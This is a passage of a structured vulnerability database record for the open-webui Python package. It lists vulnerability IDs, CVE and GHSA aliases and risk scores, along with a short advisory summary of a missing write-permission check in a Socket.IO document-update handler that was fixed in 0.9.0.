| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44553, GHSA-45m8-cpm2-3v65
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-yysb-dk2k-f7g4 |
|
| 57 |
| url |
VCID-ze3m-g96u-27fc |
| vulnerability_id |
VCID-ze3m-g96u-27fc |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the ydoc:document:update Socket.IO event handler checks whether the sender is a member of the document's Socket.IO room (line 678) but does not verify that the sender has write permission. Users with read-only access join the document room via ydoc:document:join, which only requires read permission (line 520). Once in the room, the user can emit ydoc:document:update events that modify the in-memory Yjs document state and are broadcast to all other collaborators in real time. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44564, GHSA-vrfh-rj4q-rmhr
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ze3m-g96u-27fc |
|
|
|---|